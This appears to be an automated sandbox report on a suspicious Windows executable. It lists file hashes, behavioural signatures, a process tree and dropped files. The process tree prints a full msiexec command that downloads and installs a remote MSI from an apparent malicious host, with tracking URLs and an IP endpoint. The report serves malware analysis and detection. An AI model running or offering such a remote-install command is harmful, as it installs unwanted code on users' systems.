Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 07:04

General

  • Target

    ecb85d95c4aca1202e34c2b125a2c250N.exe

  • Size

    1.4MB

  • MD5

    ecb85d95c4aca1202e34c2b125a2c250

  • SHA1

    7ab9fe65804ab65b141b61d5d78d1cd51863a5f3

  • SHA256

    65ec76bf52dbdb94fa4fb5d83b6445f910c33a5288f618e7d91385be660f17eb

  • SHA512

    0231e6cd4edba9658d7ec17f69dfc859898af4e86107fca1add797ad97861cc908f2589cfcc6946f6c0da0095dbc2606292a2ba1a395e2541878c2f905365df9

  • SSDEEP

    24576:SaQv0pic0lIpgYtQsCeya+QuVBY/H/wUUG/y324CDDlUNbaIWMi:Sa1peIVQsTCYf4LGvvDRUgHMi

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe
    "C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp
      "C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\MSIEXEC.EXE
        MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/allstar/All Star Slots20160209125305.msi" DDC_DID=1454323 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=1454323 DDC_UPDATESTATUSURL=http://190.4.94.65:8080/allstar/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.94.65:8080/allstar/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~pcicvvgipa.tmp"
        3⤵
        • Use of msiexec (install) with remote resource
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:2756

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\_isB59E.tmp

          Filesize

          1KB

          MD5

          7517b9e0ebd0104cc79ba81384274cdb

          SHA1

          c5427d7b52d533deabb4902641eeb6e2bf2c865e

          SHA256

          038bf4e17f9344d1eaa5d2de9a41fa4ebd771efeaf0779765fa428b8105b9c93

          SHA512

          a51b53e72ad13baa1f1cfd845af8fde96f4afec4065119c2a597313c1dc8c67043c8375ca54601035d22d84b50cc73f9d884cd85180cdeaa2f21805c1bee20d0

        • C:\Users\Admin\AppData\Local\Temp\{0C0E2779-9CB7-4920-A437-37A84C0F3098}\0x0409.ini

          Filesize

          21KB

          MD5

          be345d0260ae12c5f2f337b17e07c217

          SHA1

          0976ba0982fe34f1c35a0974f6178e15c238ed7b

          SHA256

          e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

          SHA512

          77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

        • C:\Users\Admin\AppData\Local\Temp\{0C0E2779-9CB7-4920-A437-37A84C0F3098}\_ISMSIDEL.INI

          Filesize

          20B

          MD5

          db9af7503f195df96593ac42d5519075

          SHA1

          1b487531bad10f77750b8a50aca48593379e5f56

          SHA256

          0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

          SHA512

          6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

        • C:\Users\Admin\AppData\Local\Temp\~B57C.tmp

          Filesize

          5KB

          MD5

          b988e8eaf0e2b9e295ba59d624190f34

          SHA1

          3e74acee428150c0bf1d0444a3a2dc5fc22a6307

          SHA256

          4c77c6717782314118d016fd6cba0d355cc64bbcf5a0d7aaf7284e5591d660a8

          SHA512

          5236d29a8cd49fb59a786af0b9b2151a639d9e3675fe1ae9ac6ba17660340bca905ff2e37667a1db02092a35175b1e5423e4deebfcbc46ed61458dbf9c339c87

        • \Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp

          Filesize

          1.2MB

          MD5

          b805b8500a08be1317384b954ae0acff

          SHA1

          091521daaf9d208b4fad59d1bec273779cebbae8

          SHA256

          f03dcb8a1c3099081cb9fec98369c4c55840b0ecae421b670c5b5cdaf64f0bea

          SHA512

          b543f30ec61f2d1d6a9400af585576cdb69709eec9b51c14534fc89382fde945b9d0353393a66afc29f935a87ea4523bc044a7a51e1895253398eba676d5bad7